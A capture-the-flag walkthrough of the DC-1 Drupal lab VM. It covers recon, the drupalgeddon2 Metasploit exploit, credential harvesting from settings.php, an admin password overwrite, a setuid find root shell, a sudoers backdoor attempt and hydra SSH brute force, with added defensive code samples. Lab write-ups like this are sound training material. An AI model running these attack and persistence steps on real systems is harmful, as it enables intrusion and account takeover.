DC-1 Target Machine Penetration
1. Penetration process
Let's get straight into it~~
IP discovery
netdiscover
Found a host at 192.168.0.119; let's scan its ports:
nmap -sT -T4 -v -p- 192.168.0.119 -oN /tmp/res.txt
# -T4 is the timing template; typed as a bare "T4" (as in the log below) nmap parses it as a second target hostname
Results:
# Nmap 7.70 scan initiated Fri Apr 24 14:34:40 2020 as: nmap -sT -v -p- -oN /tmp/res.txt T4 192.168.0.119
Nmap scan report for T4 (223.82.248.117) [host down]
Nmap scan report for 192.168.0.119
Host is up (0.00017s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
47675/tcp open unknown
MAC Address: 00:0C:29:D0:43:83 (VMware)
Read data files from: /usr/bin/../share/nmap
# Nmap done at Fri Apr 24 14:34:45 2020 -- 2 IP addresses (1 host up) scanned in 5.79 seconds
There is an rpcbind service I hadn't seen before, so I looked it up on Baidu: RPC is short for Remote Procedure Call. The principle behind SAP's RPC calls is actually quite simple and somewhat resembles a three-tier C/S architecture: a third-party client program calls SAP's internal standard or custom functions through an interface, takes the data the function returns, processes it, and then displays or prints it.
Next, run nikto against the web service and let it scan for a while...
nikto turned up two fairly useful URLs:
http://192.168.0.119/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 # this one is phpinfo()
http://192.168.0.119/xmlrpc.php # this one only shows a single line: XML-RPC server accepts POST requests only.
No idea how to use these yet...
Let's open the site in a browser.
It's just a login page?
The wappalyzer browser extension shows the web framework is Drupal 7.
First, check whether the framework has known vulnerabilities.
Fire up our trusty tool:
msfconsole
Search for framework exploits:
search Drupal
Quite a few hits; we'll go straight for the newest one:
Name: exploit/unix/webapp/drupal_drupalgeddon2
Disclosure Date: 2018-03-28
Rank: excellent
Check: Yes
Description: Drupal Drupalgeddon 2 Forms API Property Injection
show options
Let's see which parameters it needs:
Module options (exploit/unix/webapp/drupal_drupalgeddon2):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR
# only this one needs to be set before it can run
So set it:
set RHOSTS 192.168.0.119
And now the exciting moment:
exploit
We get a session. Done~
[*] Sending stage (38247 bytes) to 192.168.0.119
[*] Meterpreter session 1 opened (192.168.0.21:4444 -> 192.168.0.119:34430) at 2020-04-24 15:40:03 +0800
meterpreter > shell
# upgrade to a proper interactive shell
python -c 'import pty;pty.spawn("/bin/bash")'
ls
An ls shows a file named flag1.txt; cat it:
Every good CMS needs a config file - and so do you.
Find the config file? I didn't know where it was, so off to Baidu~
It turns out to be /var/www/sites/default/settings.php. cat it:
/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */
$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
That's flag2, and we also see the database credentials.
Log into mysql and take a look:
mysql -udbuser -pR0ck3t
- First, see which databases exist:
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| drupaldb |
+--------------------+
2 rows in set (0.02 sec)
No mysql database ~_~||
So let's enter drupaldb and look for the site's login credentials:
use drupaldb;
show tables;
+-----------------------------+
| Tables_in_drupaldb |
+-----------------------------+
| actions |
| authmap |
| batch |
| block |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_update |
| cache_views |
| cache_views_data |
| comment |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_comment_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_comment_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter |
| filter_format |
| flood |
| history |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_comment_statistics |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| system |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
+-----------------------------+
So many tables~~
There's a users table; let's query it:
select uid,name,pass from users;
+-----+-------+---------------------------------------------------------+
| uid | name | pass |
+-----+-------+---------------------------------------------------------+
| 0 | | |
| 1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR |
| 2 | Fred | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg |
+-----+-------+---------------------------------------------------------+
3 rows in set (0.00 sec)
What on earth are these password hashes??
They're not MD5, so what now?
~ Search the official site for "password reset".
Eventually, at https://www.drupal.org/node/1023428, I found the method: run
./scripts/password-hash.sh newpwd
to get the hash for a new password. So let's replace the admin user's password:
./scripts/password-hash.sh 1234
password: 1234
hash: $S$DSM0f3PE7gij.NOoFJC2nqT1A8.1M6hh5LHeeQ62d.ghV0I9yz6U
- Go into the database and update it:
update users set pass='$S$DSM0f3PE7gij.NOoFJC2nqT1A8.1M6hh5LHeeQ62d.ghV0I9yz6U' where uid=1;
Query OK, 1 row affected (0.06 sec)
Rows matched: 1 Changed: 1 Warnings: 0
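The hashes in the users table are not MD5 because Drupal 7 stores salted, iterated SHA-512 in a phpass-style "$S$" encoding: the character after "$S$" is the base-2 logarithm of the iteration count (the "D" in the admin hash means 2**15 rounds), the next eight characters are the salt, and the remainder is the digest, encoded with phpass base64 and truncated to 55 characters. The Python below is an added example, not code from the write-up or from Drupal; it follows the algorithm of Drupal 7's includes/password.inc and the function names (phpass_b64, describe_hash, drupal7_crypt, drupal7_hash, drupal7_check) are this example's own. It shows how to read the parameters out of a stored hash and how to verify a candidate password against one offline; the count_log2=7 used in the test is only to keep the round trip quick, Drupal's default is 15.

```python
"""Drupal 7 "$S$" password hashes: generate and verify.

Added example following the algorithm in Drupal 7's includes/password.inc;
this is not the write-up's code and not Drupal's own code. Function and
constant names are this example's own.
"""
import hashlib
import hmac
import os

# phpass alphabet: index 0 is '.', so the 'D' in '$S$D...' means count_log2 = 15
ITOA64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
HASH_LENGTH = 55            # stored hashes are truncated to 55 characters
DEFAULT_COUNT_LOG2 = 15     # Drupal 7 default: 2**15 = 32768 SHA-512 rounds
MIN_COUNT_LOG2, MAX_COUNT_LOG2 = 7, 30


def phpass_b64(data: bytes) -> str:
    """phpass-style base64: 3-byte groups packed little-endian, no padding.
    Not interchangeable with RFC 4648 base64."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3f])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3f])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3f])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3f])
    return ''.join(out)


def describe_hash(stored: str) -> dict:
    """Split a stored $S$ hash into its parameters, or return {} if malformed."""
    if len(stored) < 12 or not stored.startswith('$S$'):
        return {}
    count_log2 = ITOA64.find(stored[3])
    if not MIN_COUNT_LOG2 <= count_log2 <= MAX_COUNT_LOG2:
        return {}
    return {'algorithm': 'sha512', 'count_log2': count_log2,
            'iterations': 1 << count_log2, 'salt': stored[4:12]}


def drupal7_crypt(password: str, setting: str):
    """Hash `password` under the 12-character setting prefix
    ($S$ + count character + 8-character salt). Returns None when the
    setting is malformed, as Drupal's _password_crypt() does."""
    params = describe_hash(setting)
    if not params:
        return None
    salt = params['salt'].encode()
    pw = password.encode()
    digest = hashlib.sha512(salt + pw).digest()
    for _ in range(params['iterations']):
        digest = hashlib.sha512(digest + pw).digest()
    return (setting[:12] + phpass_b64(digest))[:HASH_LENGTH]


def drupal7_hash(password: str, count_log2: int = DEFAULT_COUNT_LOG2) -> str:
    """Produce a fresh hash with a random 8-character salt, the way
    scripts/password-hash.sh does."""
    count_log2 = min(max(count_log2, MIN_COUNT_LOG2), MAX_COUNT_LOG2)
    setting = '$S$' + ITOA64[count_log2] + phpass_b64(os.urandom(6))
    return drupal7_crypt(password, setting)


def drupal7_check(password: str, stored: str) -> bool:
    """Constant-time check of a candidate password against a stored hash."""
    computed = drupal7_crypt(password, stored)
    return computed is not None and hmac.compare_digest(computed, stored)


if __name__ == '__main__':
    # The admin hash from the users table on this page.
    print(describe_hash('$S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR'))
    fresh = drupal7_hash('1234')
    print(fresh, drupal7_check('1234', fresh), drupal7_check('wrong', fresh))
```

Pointing drupal7_check at the hash that password-hash.sh printed for 1234 above is a quick way to confirm the two implementations agree. The 2**15 iteration count is also why a plain MD5 lookup fails on these values: each guess costs 32768 SHA-512 computations, which is the whole point of the format.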
Log in to the site and click "content" in the top menu. There is an article titled flag3 whose content is:
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
The key hints are FIND, -exec and shadow; so let's look at the /etc/shadow file:
cat: /etc/shadow: Permission denied
No permission?
What about /etc/passwd, then?
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:104::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
- There is a user called flag4 whose home directory is /home/flag4:
ls /home/flag4
flag4.txt
- There is a flag4.txt; let's try reading it:
cat /home/flag4/flag4.txt
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
- Search in root?
# use find on an arbitrary file and -exec to spawn a shell
find ./ xxx -exec '/bin/sh' \;
This gives a shell with root privileges.
cd into /root:
# there is a file thefinalflag.txt
cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
Done~
Let's leave a user behind~
# create a login-capable user in the root group and set a password
useradd rex -m -s /bin/bash -d /home/rex -g root; passwd rex
# give it root privileges
chmod u+w /etc/sudoers; echo 'rex ALL=(ALL:ALL) ALL' >> /etc/sudoers; chmod u-w /etc/sudoers
- Unexpectedly:
/bin/sh: 20: useradd: not found # no useradd command?
Oh well, heh, all 5 flags are in hand, never mind.
Later I brute-forced flag4's password:
# brute-force the password:
hydra -l flag4 -P /tmp/password.lst -t 5 ssh://192.168.0.119
# the wordlist is at /usr/share/john/password.lst
# you can also build your own
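On the target, the hydra run above lands in /var/log/auth.log as a burst of "Failed password" lines from one source address, followed by an "Accepted password" for the same user the moment the wordlist hits. The Python below is an added defender-side example, not part of the write-up: it parses OpenSSH password-authentication log lines, raises a medium alert when one source reaches a failure threshold inside a time window, and a high alert when that source then logs in successfully inside the same window. The log lines are constructed to mirror this page's scenario (attacking host 192.168.0.21 from the Meterpreter session, target DC-1, user flag4); the hostname, process IDs and ports are made up, and parse_line, detect_bruteforce and SAMPLE_AUTH_LOG are this example's own names.

```python
"""Detect SSH password-guessing bursts in OpenSSH auth.log lines.

Added defender-side example, not part of the DC-1 write-up. The log lines
below are constructed to mirror the hydra run on this page; hostname, PIDs
and ports are made up.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Optional

# Matches the two outcome lines sshd writes for password authentication.
LOG_RE = re.compile(
    r'^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: '
    r'(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) '
    r'from (?P<src>\S+) port \d+ ssh2$'
)


def parse_line(line: str, year: int = 2020) -> Optional[Dict]:
    """Return {ts, result, user, src} for a password-auth line, else None.
    syslog timestamps carry no year, so the caller supplies one."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return None
    ts = datetime.strptime(f'{year} {m["ts"]}', '%Y %b %d %H:%M:%S')
    return {'ts': ts, 'result': m['result'], 'user': m['user'], 'src': m['src']}


def detect_bruteforce(lines: Iterable[str], threshold: int = 5,
                      window: timedelta = timedelta(seconds=60)) -> List[Dict]:
    """Sliding-window detector.
    - 'medium' when one source reaches `threshold` failures inside `window`
    - 'high' when that source then logs in successfully inside the window
      (the signature of a dictionary attack that found the password)"""
    failures: Dict[str, List[datetime]] = defaultdict(list)
    alerts: List[Dict] = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        src = ev['src']
        # keep only the failures still inside the window relative to this event
        failures[src] = [t for t in failures[src] if ev['ts'] - t <= window]
        if ev['result'] == 'Failed':
            failures[src].append(ev['ts'])
            if len(failures[src]) == threshold:   # fire once per burst
                alerts.append({'severity': 'medium', 'src': src, 'user': ev['user'],
                               'at': ev['ts'],
                               'reason': f'{threshold} failed logins within '
                                         f'{int(window.total_seconds())}s'})
        elif len(failures[src]) >= threshold:
            alerts.append({'severity': 'high', 'src': src, 'user': ev['user'],
                           'at': ev['ts'],
                           'reason': f'successful login after {len(failures[src])} failures'})
    return alerts


# Constructed auth.log excerpt: seven guesses, then a hit, from 192.168.0.21;
# one typo and a normal login from an unrelated host; one non-auth line.
SAMPLE_AUTH_LOG = """\
Apr 24 16:02:11 DC-1 sshd[2101]: Failed password for flag4 from 192.168.0.21 port 45601 ssh2
Apr 24 16:02:11 DC-1 sshd[2103]: Failed password for flag4 from 192.168.0.21 port 45602 ssh2
Apr 24 16:02:12 DC-1 sshd[2105]: Failed password for flag4 from 192.168.0.21 port 45603 ssh2
Apr 24 16:02:12 DC-1 sshd[2107]: Failed password for flag4 from 192.168.0.21 port 45604 ssh2
Apr 24 16:02:13 DC-1 sshd[2109]: Failed password for flag4 from 192.168.0.21 port 45605 ssh2
Apr 24 16:02:13 DC-1 sshd[2111]: Failed password for flag4 from 192.168.0.21 port 45606 ssh2
Apr 24 16:02:14 DC-1 sshd[2113]: Failed password for flag4 from 192.168.0.21 port 45607 ssh2
Apr 24 16:02:15 DC-1 sshd[2115]: Accepted password for flag4 from 192.168.0.21 port 45608 ssh2
Apr 24 16:05:40 DC-1 sshd[2200]: Failed password for flag4 from 192.168.0.50 port 50120 ssh2
Apr 24 16:05:47 DC-1 sshd[2202]: Accepted password for flag4 from 192.168.0.50 port 50121 ssh2
Apr 24 16:06:01 DC-1 sshd[2202]: pam_unix(sshd:session): session opened for user flag4 by (uid=0)
"""

if __name__ == '__main__':
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG.splitlines()):
        print(alert['severity'].upper(), alert['src'], alert['user'], alert['reason'])
```

Run against the sample it reports one medium alert at the fifth failure and one high alert at the login that follows; the single typo from 192.168.0.50 never crosses the threshold. The "-t 5" in the hydra command is the number of parallel connections, so in a real log the failures arrive interleaved and within the same second, which is why the window is measured in seconds rather than per-line.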
2. Important information
#1. mysql credentials:
user:dbuser passwd:R0ck3t
#2. ssh credentials:
user:flag4 passwd:orange
3. flags
# flag1
# in the website's root directory
# content:
Every good CMS needs a config file - and so do you.
# flag2
# in /var/www/sites/default/settings.php (the framework's configuration file)
# content:
/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */
# flag3
# in the site's content section after logging in
# content:
"Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow."
# flag4
# /home/flag4/flag4.txt, in the home directory of the server user 'flag4'
# content:
`Can you use this same method to find or access the flag in root?`
`Probably. But perhaps it's not that easy. Or maybe it is?`
# flag5
# /root/thefinalflag.txt, in the root user's home directory
# content:
"Well done!!!!"
"Hopefully you've enjoyed this and learned some new skills."
"You can let me know what you thought of this little journey"
"by contacting me via Twitter - @DCAU7"
4. Supplementary notes
Privilege escalation via find
find . -exec '/bin/sh' \; # if the find binary has -r-sr-sr-x permissions (setuid/setgid root), running this yields a root shell
# the following commands try to locate SUID files owned by root; different systems respond to different variants, so try them one by one
find / -user root -perm -4000 -print 2>/dev/null # find SUID files
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
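The commands above are the attacker's view of the setuid inventory; the defender's counterpart is a periodic audit that compares the host's setuid-root files against a known-good baseline, so a setuid find (the DC-1 escalation path) is noticed before anyone runs it with -exec. The Python below is an added example, not from the write-up: scan_setuid() collects the same files as `find / -user root -perm -4000`, and audit() reports what is setuid but not baselined, what is on a never-setuid list even if baselined, and what has lost its setuid bit since the baseline was taken (a sign of tampering). EXAMPLE_BASELINE, NEVER_SETUID and SAMPLE_ENTRIES are constructed for illustration and are not a recommended configuration for any distribution; the function names are this example's own.

```python
"""Setuid-root inventory and baseline diff.

Added example, not from the DC-1 write-up. EXAMPLE_BASELINE, NEVER_SETUID
and SAMPLE_ENTRIES are constructed for illustration, not a recommended
configuration for any particular distribution.
"""
import os
import stat
from typing import Dict, Iterable, List, Set, Tuple

# One inventory record per file: (path, st_mode, st_uid)
Entry = Tuple[str, int, int]

# Files expected to be setuid root on the host (taken from a known-good image in practice).
EXAMPLE_BASELINE: Set[str] = {'/usr/bin/passwd', '/usr/bin/sudo', '/bin/su', '/bin/mount'}

# Binaries that must never be setuid because -exec hands out a shell as the
# file owner; find is the one this page abuses. Extend per local policy.
NEVER_SETUID: Set[str] = {'find'}


def is_setuid_root(mode: int, uid: int) -> bool:
    """True for a regular file owned by root with the setuid bit set."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID) and uid == 0


def scan_setuid(root: str = '/') -> List[Entry]:
    """Walk `root` and collect setuid-root regular files; this is what
    `find / -user root -perm -4000` from the write-up reports."""
    found: List[Entry] = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        # do not descend into symlinked directories (loops, bind mounts)
        dirnames[:] = [d for d in dirnames
                       if not os.path.islink(os.path.join(dirpath, d))]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)   # lstat: a symlink to a setuid file is not itself setuid
            except OSError:
                continue
            if is_setuid_root(st.st_mode, st.st_uid):
                found.append((path, st.st_mode, st.st_uid))
    return found


def audit(entries: Iterable[Entry], baseline: Set[str]) -> Dict[str, List[str]]:
    """Compare an inventory with the baseline.
    unexpected    setuid root but not in the baseline
    never_setuid  setuid root and on the NEVER_SETUID list (flagged even if baselined)
    missing       in the baseline but no longer setuid root (possible tampering)"""
    present = {path for path, mode, uid in entries if is_setuid_root(mode, uid)}
    return {
        'unexpected': sorted(present - baseline),
        'never_setuid': sorted(p for p in present if os.path.basename(p) in NEVER_SETUID),
        'missing': sorted(baseline - present),
    }


# Constructed inventory standing in for a scan of a DC-1-like host.
SAMPLE_ENTRIES: List[Entry] = [
    ('/usr/bin/passwd', 0o104755, 0),     # regular file, setuid, root: expected
    ('/usr/bin/sudo',   0o104755, 0),     # expected
    ('/bin/su',         0o104755, 0),     # expected
    ('/usr/bin/find',   0o106755, 0),     # -rwsr-sr-x root find: the DC-1 escalation path
    ('/bin/mount',      0o100755, 0),     # baselined, but the setuid bit has been removed
    ('/tmp/helper',     0o104755, 1000),  # setuid but not root-owned: out of scope here
]

if __name__ == '__main__':
    for category, paths in audit(SAMPLE_ENTRIES, EXAMPLE_BASELINE).items():
        print(f'{category:13} {paths}')
```

For a live host, replace SAMPLE_ENTRIES with scan_setuid('/') and the example baseline with one recorded from a clean install; the 'never_setuid' category is the one worth paging on, since a setuid find is a root shell for every local user regardless of whether someone added it to the baseline.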
THE_END